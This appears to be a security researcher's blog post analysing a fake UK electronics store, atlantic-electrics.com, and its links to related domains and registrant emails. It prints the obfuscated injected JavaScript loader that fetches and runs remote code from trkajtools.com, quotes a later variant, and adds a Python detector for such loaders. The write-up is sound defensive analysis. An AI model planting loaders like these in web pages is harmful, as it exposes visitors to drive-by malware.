Suspicious online store “www.atlantic-electrics.com”, “bidtravel@ya.ru” and “trkajtools.com”

Today I came across another suspicious website. This one is advertising on Amazon and other locations:

[Screenshot: atlantic electrics advert.png – the advert as shown on Amazon]

The website advertised is “www.atlantic-electrics.com”. Upon further inspection, the following are red flags:

  • The domain has only been registered since 26th October 2017. Not even two weeks old at the time of writing.
  • The domain uses “bitcoin-dns hosting”. Bitcoin doesn’t, yet, have much legitimate use; the person hosting this website is paying by an anonymous payment method.
  • At the time of writing, visitors are just being shown a proxied version of the Co-op Electrical website with one bit of injected code:
<script>
// The loader URL is stored as a comma-separated list of characters, so the string
// "https://trkajtools.com/flash/update" never appears literally in the page source.
var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];
var lF = CIfRD.join('').replace(/,/g, '');
function bGZxEi() {
  // Append a <script src=...> element to the body so the remote file is fetched and executed.
  function GN(jrekWr) {
    var NeSHCgurTf = document.createElement('script');
    NeSHCgurTf.setAttribute('type', 'text/javascript');
    NeSHCgurTf.setAttribute('src', jrekWr);
    if (typeof NeSHCgurTf != 'undefined') {
      document.getElementsByTagName('body')[0].appendChild(NeSHCgurTf)
    };
  }
  GN(lF)
}
// Run the loader once the page has finished loading (with fallbacks for old browsers).
if (window.addEventListener) {
  window.addEventListener('load', bGZxEi, false);
} else if (window.attachEvent) {
  window.attachEvent('onload', bGZxEi);
} else if (window.onLoad) {
  window.onload = bGZxEi;
}
</script>

In short, the code injected into the page requests JavaScript from:

hxxps://trkajtools.com/flash/update

UPDATE 2017-11-14: This has now changed; the page is now injecting:

<script src='https://mobileinstore.co.uk/Loaded'></script>

Right now the above page is just serving a 0 byte file or rejecting the connection entirely.
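Both injection variants above (the comma-split character array and the plain external script tag) are easy to miss when eyeballing a proxied page. The following is an added example, not code from this post, of a small static checker that pulls the script tags out of a saved copy of the page, rebuilds the URL hidden by the join('')/replace(/,/g,'') trick without executing any JavaScript, and flags any external script host that is not on an allowlist. SAMPLE_HTML is a constructed page containing the two loaders described above, and ALLOWED_HOSTS is an assumed list of hosts the genuine site is expected to load scripts from.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page (not captured from the live site): the first <script>
# mirrors the original comma-split loader, the second mirrors the 2017-11-14
# update, and the third is a normal same-origin script that should not be flagged.
SAMPLE_HTML = """<html><body><p>Shop</p>
<script>var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];var lF = CIfRD.join('').replace(/,/g,'');</script>
<script src='https://mobileinstore.co.uk/Loaded'></script>
<script src="/static/app.js"></script>
</body></html>"""

# Assumption for the example: hosts the proxied site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.atlantic-electrics.com"}

# A JS string literal whose characters are separated by commas ('h,t,t,p,s,:,/,/,...').
# Requires at least seven characters so short literals such as '' or 'a,b' are ignored.
COMMA_SPLIT = re.compile(r"""['"]((?:[^'",]\s*,\s*){6,}[^'",])['"]""")


def decode_comma_split(literal):
    """Statically reproduce .join('').replace(/,/g,''): drop every comma."""
    return literal.replace(",", "")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []        # values of src= on <script> tags
        self.inline = []      # bodies of <script> tags without src=
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def find_injected_loaders(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, url) findings for scripts loaded from non-allowlisted hosts.

    kind is "external-script" for a plain <script src=...> pointing off-site and
    "obfuscated-loader" for a URL rebuilt from a comma-split character literal.
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlsplit(src).hostname   # None for relative URLs such as /static/app.js
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        for match in COMMA_SPLIT.finditer(body):
            decoded = decode_comma_split(match.group(1))
            if re.match(r"https?://", decoded):
                findings.append(("obfuscated-loader", decoded))
    return findings


if __name__ == "__main__":
    for kind, url in find_injected_loaders(SAMPLE_HTML):
        print(f"{kind}: {url}")
```

The checker only understands the specific join/replace trick seen on this site; a loader that builds its URL some other way (string reversal, character codes) needs its own decoder or a sandboxed JavaScript run. Treating every off-allowlist script host as a finding is deliberate: on a page that is supposed to be a faithful proxy of a retailer, any unexpected third-party script is worth a look.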

I will come back to the trkajtools.com domain later, but for the moment let’s go back to atlantic-electrics.com.

The domain is registered with the following interesting information:

  • The email address “eugeneigibbons9@gmail.com”
  • The postcode “TS20 9GD”
  • The email address “bidtravel@ya.ru” (associated with the bitcoin-dns account)

eugeneigibbons9@gmail.com
This e-mail address has been used to register two other suspicious domains named after UK retailers:

https://currys.biz – a take on the name of “Currys PC World” in the UK. This site seems to just proxy through to eBuyer (another UK online electronics retailer) but also injects the “trkajtools” JavaScript.

https://pixmania.biz – another UK retailer name. This website currently proxies through to “coolshop” (whoever they are) and also injects the “trkajtools” JavaScript.

“TS20 9GD” – a postcode in the UK format; however, this postcode does not exist!

“bidtravel@ya.ru”
An email address associated with many writeups about sites using the Angler exploit kit.
This e-mail address is also associated with trkajtools.com.

The website www.atlantic-electrics.com is hosted at 45.76.134.125 (“45.76.134.125.vultr.com”) and does not seem to host anything else.

So, going back to “trkajtools.com”:
This domain was purchased on 17th October 2017 and little intelligence exists about it. The only thing on Google was the urlquery report that I ran on the domain earlier in the day. The domain also uses “bitcoin-dns.hosting”.

The website trkajtools.com is hosted at 45.76.135.68 (“45.76.135.68.vultr.com”) and also does not seem to host anything else.

Summary

A lot of the malicious or suspicious websites I find have a clear motive: ones targeting electronics retail are normally there to steal credit card details, or just to trick visitors into sending money with no intention of shipping goods.
The atlantic-electrics website is far more ambiguous. It seems like a lot of effort just to infect a few people with an exploit kit whilst serving a page from a genuine retailer.
Possibly they plan to infect people while they browse available websites and then skim the payment details once they place an order on a genuine website?

Maybe what is currently in place is just temporary, and the website flips to being much more malicious at certain times of day or days of the week?
